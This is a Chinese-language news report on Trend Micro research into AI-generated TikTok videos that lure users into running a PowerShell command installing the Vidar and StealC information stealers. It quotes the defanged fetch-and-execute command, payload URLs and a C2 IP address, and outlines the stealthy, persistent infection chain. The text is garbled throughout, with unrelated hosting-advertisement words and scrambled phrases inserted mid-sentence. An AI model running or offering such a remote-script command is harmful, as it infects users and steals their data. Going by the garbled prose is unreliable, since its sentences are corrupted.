AI 生成恶意软件：TikTok 视频通过 PowerShell 命令传播信息窃取程序

趋势科技（Trend Micro）最新研究揭露 ，生成视频TikTok平台正出现一种新型威胁：AI生成的恶意视频诱骗用户执行恶意PowerShell命令，使其暴露在强大的软件信息窃取恶意软件风险之下 。

导致Vidar和StealC恶意软件的通过感染链条 | 图片来源：Trend Micro

社交工程攻击新手法

趋势科技近期曝光了一起危险的社交工程攻击活动 ，黑客利用TikTok的服务器租用命令病毒式传播平台分发Vidar和StealC——两种复杂的信息窃取恶意软件家族
。网络犯罪分子通过AI生成内容和利用用户信任，传播程序将看似无害的信息视频教程转变为恶意软件传播载体 。

报告指出："这类攻击使用视频（可能由AI生成）诱导用户执行PowerShell命令 ，生成视频这些命令被伪装成软件激活步骤。恶意"

攻击传播机制

攻击始于@gitallowed、源码下载软件@zane.houghton和@sysglow.wow等TikTok账号分享的通过匿名教程视频 ，指导观众激活Windows 、命令Spotify或CapCut等软件 。传播程序部分视频播放量超过50万次 ，信息展示的生成视频"激活"步骤最终会引导用户执行如下PowerShell命令 ：

复制iex (irm hxxps://allaivo[.]me/spotify)1.

趋势科技强调："视频指示观众运行一系列命令...指导语音也疑似AI生成，进一步表明攻击者使用AI工具制作这些视频。建站模板"

该命令会下载并执行远程脚本，启动一个兼具隐蔽性和持久性的恶意软件投放链。

攻击流程详解用户观看TikTok视频后直接执行PowerShell命令从hxxps://allaivo[.]me/spotify下载并运行远程脚本在APPDATA和LOCALAPPDATA创建隐藏目录 ，并添加到Windows Defender排除列表下载二级有效载荷——通常是从hxxps://amssh[.]co/file.exe获取的Vidar或StealC从hxxps://amssh[.]co/script.ps1获取最终持久化脚本，使恶意软件能在系统重启后继续运行删除日志和临时文件夹以掩盖取证证据

趋势科技警告称："脚本采用重试逻辑确保有效载荷成功下载
，高防服务器然后以隐藏的提升权限进程启动恶意软件可执行文件。"

新型C&C通信技术

恶意软件激活后 ，会使用新型规避技术与命令控制（C&C）服务器通信：

Vidar利用Steam和Telegram等平台作为Dead Drop Resolvers（DDR，死投解析器） ，将真实服务器地址隐藏在个人资料元数据中StealC直接连接基于IP的终端（如91[.]92[.]46[.]70）

研究人员指出
："Vidar尤其滥用Steam和Telegram等合法服务作为死投解析器。"

AI驱动的香港云服务器恶意软件新时代

TikTok算法放大效应与AI生成欺骗手段的结合，标志着恶意软件传播进入新时代 。正如趋势科技强调："AI生成内容的使用 ，使这类攻击从孤立事件升级为高度可扩展的运营活动
。"

亿华云